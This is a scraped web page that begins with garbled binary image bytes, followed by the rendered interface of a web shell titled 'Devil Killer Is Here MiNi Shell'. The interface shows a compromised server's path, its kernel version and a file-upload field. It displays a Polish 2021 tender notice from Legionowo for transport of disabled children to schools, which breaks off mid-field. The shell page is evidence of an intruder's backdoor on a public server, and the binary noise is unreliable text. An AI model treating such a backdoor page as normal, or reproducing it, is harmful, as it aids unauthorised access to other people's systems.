JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210728/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210728/0012945801-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00129458 z dnia 2021-07-28</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz dzieci i uczniów niepełnosprawnych z terenu miasta Legionowo do szkół i placówek oświatowych w roku szkolnym 2021/2022 oraz powrót do miejsca zamieszkania wraz z zapewnieniem opieki, </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Legionowo Urząd Miasta Legionowo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000524832</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">marsz. Józefa Piłsudskiego 41</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Legionowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-120</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@um.legionowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.legionowo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz dzieci i uczniów niepełnosprawnych z terenu miasta Legionowo do szkół i placówek oświatowych w roku szkolnym 2021/2022 oraz powrót do miejsca zamieszkania wraz z zapewnieniem opieki, </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0175ea90-ef7c-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00129458</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001598/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Dowóz uczniów niepełnosprawnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/legionowo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/legionowo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">[...]4.<br/>Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz<br/>przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, odbywa się przy<br/>użyciu strony internetowej https://platformazakupowa.pl/pn/legionowo5. Przesłanie przez Wykonawcę<br/>pytań o wyjaśnienie treści SWZ, oświadczeń, wniosków, zawiadomień lub informacji w inny sposób niż<br/>wskazany, może skutkować nie dotarciem oświadczeń, wniosków, zawiadomień lub informacji do<br/>komisji przetargowej w wyznaczonym terminie. Korespondencja taka, nie będzie brana pod uwagę<br/>przez komisję przetargową podczas czynności badania i oceny ofert.6. Oferty, oświadczenia, o których<br/>mowa w art. 125 ust. 1 ustawy Pzp, podmiotowe środki dowodowe, w tym oświadczenie, o którym<br/>mowa w art. 117 ust. 4 ustawy Pzp, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym<br/>mowa w art. 118 ust. 3 ustawy Pzp, zwane dalej "zobowiązaniem podmiotu udostępniającego zasoby",<br/>pełnomocnictwo, sporządza się w postaci elektronicznej, w formatach danych określonych w<br/>przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności<br/>podmiotów realizujących zadania publiczne, z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, z uwzględnieniem rodzaju przekazywanych danych.7. Informacje, oświadczenia lub<br/>dokumenty, inne niż określone w ust. 6, przekazywane w postępowaniu, sporządza się w postaci<br/>elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z<br/>dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne lub jako<br/>tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji<br/>elektronicznej tj. przy użyciu strony internetowej https://platformazakupowa.pl/pn/legionowo8. W<br/>przypadku przekazywania w postępowaniu dokumentu elektronicznego w formacie poddającym dane<br/>kompresji, opatrzenie pliku zawierającego skompresowane dokumenty kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym, jest równoznaczne z opatrzeniem<br/>wszystkich dokumentów zawartych w tym pliku odpowiednio kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym.[...]12. Minimalne wymagania techniczne umożliwiające<br/>korzystanie ze strony https://platformazakupowa.pl/pn/legionowo to 1) dowolna przeglądarka<br/>internetowa w najnowszej dostępnej wersji, z włączoną obsługą języka Javascript, akceptująca pliki<br/>typu „cookies”2) łącze internetowe o przepustowości, co najmniej 256 kb/s,3) komputer klasy PC lub<br/>MAC, o następującej konfiguracji: pamięć min. 2 GB RAM, procesor o taktowaniu min. 2 GHZ, jeden z<br/>systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje.4) Platforma<br/>jest zoptymalizowana dla minimalnej rozdzielczości ekranu 1024x768 pikseli.13. Występuje limit<br/>objętości plików lub spakowanych folderów w zakresie całej oferty lub wniosku do ilości 10 plików lub<br/>spakowanych folderów przy maksymalnej wielkości 150 MB.14. Szczegółowe informacje techniczne i<br/>organizacyjne wysyłania i odbioru dokumentów przy użyciu strony<br/>https://platformazakupowa.pl/pn/legionowo znajdują się w Regulaminie oraz instrukcjach dostępnych na portalu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Rz.271.22.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2. Zadanie 1: Przedmiotem niniejszego zamówienia są usługi transportowe świadczone w dni nauki szkolnej począwszy od 1 września 2021 r. do końca zajęć dydaktyczno -wychowawczych w roku szkolnym 2021/2022 tj. 24.06.2022 r. Usługa transportowa polegać ma na dowozie uczniów niepełnosprawnych z miejsca zamieszkania tj. Legionowa do szkół/placówek oświatowych wskazanych w zamówieniu i odwożeniu ich po zakończeniu nauki do miejsca zamieszkania z zapewnieniem w czasie przewozu opieki. Osoba pełniąca funkcję opiekuna musi w szczególności zapewnić bezpieczeństwo w trakcie przewozu dzieci do i ze szkół, zapewnić pomoc przy wsiadaniu i wysiadaniu uczniom/dzieciom, nadzorować przejście dzieci/uczniów z pojazdu do i ze szkoły oraz zwracać uwagę na właściwe zachowanie uczniów/ dzieci w czasie przejazdu. W przypadku sytuacji zagrażającej bezpieczeństwu uczniów w pojeździe, niedopuszczenie do ich przewozu.<br/> Dowóz uczniów niepełnosprawnych na trasie z miejsca zamieszkania tj. Legionowo do szkół i placówek oświatowych na terenie Legionowa oraz droga powrotna:<br/> Dowóz 9 uczniów z miejsca zamieszkania i powrót wraz z zapewnieniem opieki, z możliwością zwiększenia liczby maksymalnie o 2 uczniów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60000000-8 - Usługi transportowe (z wyłączeniem transportu odpadów)</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60100000-9 - Usługi w zakresie transportu drogowego</p> <p class="mb-0">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-06-24</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówień o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp. dla Zadania 1-3 przewiduje możliwość udzielenia zamówień dotychczasowemu wykonawcy usług, zamówień polegających na powtórzeniu podobnych usług, jeżeli takie zamówienie jest zgodne z jego przedmiotem, pod warunkiem, że:<br/> 1) do dnia 31 sierpnia 2022 r. nie zostanie zawarta umowa z wykonawcą w kolejnym przetargu w trybie podstawowym przez Gminę Miejską Legionowo na dowożenie dzieci/uczniów niepełnosprawnych z terenu miasta Legionowo do przedszkoli i szkół oraz powrót do miejsca zamieszkania. Zamawiający przewiduje możliwość udzielenia zamówienia dotychczasowemu wykonawcy usług na okres maksymalnie 3 miesięcy, liczony od dnia 01.09.2022 r.,<br/> 2) zamawiający lub wykonawca rozwiąże kolejną umowę (obowiązującą od dnia 01.09.2022 r.) na dowożenie dzieci/uczniów niepełnosprawnych z terenu miasta Legionowo do przedszkoli i szkół oraz powrót do miejsca zamieszkania. Zamawiający przewiduje możliwość udzielenia zamówienia dotychczasowemu wykonawcy usług na okres rozstrzygnięcia nowego przetargu trybie podstawowym, jednak nie dłużej niż na okres 3 miesięcy.<br/> Zamawiający dla Zadania 1-3 przewiduje również możliwość udzielenia zamówień dotychczasowemu wykonawcy usług, zamówień polegających na powtórzeniu podobnych usług, jeżeli takie zamówienie jest zgodne z jego przedmiotem, w przypadku zwiększenia liczby dzieci ponad liczbę określoną w opisie przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający przy ocenie ofert i wyborze oferty najkorzystniejszej<br/>będzie postępować zgodnie z wymaganiami ustawy oraz kierować się przesłankami określonymi w<br/>kryteriach oceny ofert.<br/>2. Zamawiający stosować będzie ocenę punktową.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia w przypadku wystąpienia awarii pojazdu zastępczego spełniającego warunki określone w SWZ</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3. Zadanie 2:<br/> Przedmiotem niniejszego zamówienia są usługi transportowe świadczone w dni nauki szkolnej począwszy od 1 września 2021 r. do końca zajęć dydaktyczno -wychowawczych w roku szkolnym 2021/2022 tj. 24.06.2022 r. Usługa transportowa polegać ma na dowozie uczniów niepełnosprawnych z miejsca zamieszkania tj. Legionowa do szkół/placówek oświatowych wskazanych w zamówieniu i odwożeniu ich po zakończeniu nauki do miejsca zamieszkania z zapewnieniem w czasie przewozu opieki. Osoba pełniąca funkcję opiekuna musi w szczególności zapewnić bezpieczeństwo w trakcie przewozu dzieci do i ze szkół, zapewnić pomoc przy wsiadaniu i wysiadaniu uczniom/dzieciom, nadzorować przejście dzieci/uczniów z pojazdu do i ze szkoły oraz zwracać uwagę na właściwe zachowanie uczniów/ dzieci w czasie przejazdu. W przypadku sytuacji zagrażającej bezpieczeństwu uczniów w pojeździe, niedopuszczenie do ich przewozu.<br/> Dowóz uczniów niepełnosprawnych na trasie z miejsca zamieszkania tj. Legionowo do szkół i placówek oświatowych na terenie Warszawy oraz droga powrotna:<br/> Dowóz 4 uczniów z miejsca zamieszkania i powrót wraz z zapewnieniem opieki, z możliwością zwiększenia liczby maksymalnie o 2 uczniów </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60000000-8 - Usługi transportowe (z wyłączeniem transportu odpadów)</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60100000-9 - Usługi w zakresie transportu drogowego</p> <p class="mb-0">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-06-24</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówień o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp. dla Zadania 1-3 przewiduje możliwość udzielenia zamówień dotychczasowemu wykonawcy usług, zamówień polegających na powtórzeniu podobnych usług, jeżeli takie zamówienie jest zgodne z jego przedmiotem, pod warunkiem, że:<br/> 1) do dnia 31 sierpnia 2022 r. nie zostanie zawarta umowa z wykonawcą w kolejnym przetargu w trybie podstawowym przez Gminę Miejską Legionowo na dowożenie dzieci/uczniów niepełnosprawnych z terenu miasta Legionowo do przedszkoli i szkół oraz powrót do miejsca zamieszkania. Zamawiający przewiduje możliwość udzielenia zamówienia dotychczasowemu wykonawcy usług na okres maksymalnie 3 miesięcy, liczony od dnia 01.09.2022 r.,<br/> 2) zamawiający lub wykonawca rozwiąże kolejną umowę (obowiązującą od dnia 01.09.2022 r.) na dowożenie dzieci/uczniów niepełnosprawnych z terenu miasta Legionowo do przedszkoli i szkół oraz powrót do miejsca zamieszkania. Zamawiający przewiduje możliwość udzielenia zamówienia dotychczasowemu wykonawcy usług na okres rozstrzygnięcia nowego przetargu trybie podstawowym, jednak nie dłużej niż na okres 3 miesięcy.<br/> Zamawiający dla Zadania 1-3 przewiduje również możliwość udzielenia zamówień dotychczasowemu wykonawcy usług, zamówień polegających na powtórzeniu podobnych usług, jeżeli takie zamówienie jest zgodne z jego przedmiotem, w przypadku zwiększenia liczby dzieci ponad liczbę określoną w opisie przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający przy ocenie ofert i wyborze oferty najkorzystniejszej<br/>będzie postępować zgodnie z wymaganiami ustawy oraz kierować się przesłankami określonymi w<br/>kryteriach oceny ofert.<br/>2. Zamawiający stosować będzie ocenę punktową.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia w przypadku wystąpienia awarii pojazdu zastępczego spełniającego warunki określone w SWZ</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4. Zadanie 3:<br/> Przedmiotem niniejszego zamówienia są usługi transportowe świadczone:<br/> a) od 1 września 2021 r. do 31.08.2022 r. usługa transportowa polegać ma na dowozie dzieci niepełnosprawnych z miejsca zamieszkania tj. Legionowa do przedszkoli wskazanych w zamówieniu i odwożeniu ich po zakończeniu nauki do miejsca zamieszkania z zapewnieniem w czasie przewozu opieki. <br/> b) od 1 września 2021 r. do końca zajęć dydaktyczno -wychowawczych w roku szkolnym 2021/2022 tj. 24.06.2022 r. usługa transportowa polegać ma na dowozie 1 ucznia niepełnosprawnego z miejsca zamieszkania tj. Legionowa do szkoły wskazanej w zamówieniu i odwożeniu go po zakończeniu nauki do miejsca zamieszkania z zapewnieniem w czasie przewozu opieki. <br/> Osoba pełniąca funkcję opiekuna musi w szczególności zapewnić bezpieczeństwo w trakcie przewozu dzieci do i z przedszkoli/szkoły, zapewnić pomoc przy wsiadaniu i wysiadaniu dzieciom, nadzorować przejście dzieci/ucznia z pojazdu do i ze szkoły oraz zwracać uwagę na właściwe zachowanie dzieci/ucznia w czasie przejazdu. W przypadku sytuacji zagrażającej bezpieczeństwu dzieci w pojeździe, niedopuszczenie do ich przewozu.<br/> Dowóz dzieci/ucznia niepełnosprawnych na trasie z miejsca zamieszkania tj. Legionowo do przedszkoli i szkoły na terenie Legionowa i Izabelin-Nieporęt oraz droga powrotna z możliwością zwiększenia liczby maksymalnie o 1 dziecka/ucznia bez konieczności zmian w umowie :<br/> Dowóz 2 dzieci i 1 ucznia z miejsca zamieszkania i powrót wraz z zapewnieniem opieki, z możliwością zwiększenia liczby maksymalnie o 1 dziecko/ucznia </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60000000-8 - Usługi transportowe (z wyłączeniem transportu odpadów)</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60100000-9 - Usługi w zakresie transportu drogowego</p> <p class="mb-0">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający przy ocenie ofert i wyborze oferty najkorzystniejszej<br/>będzie postępować zgodnie z wymaganiami ustawy oraz kierować się przesłankami określonymi w<br/>kryteriach oceny ofert.<br/>2. Zamawiający stosować będzie ocenę punktową.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa 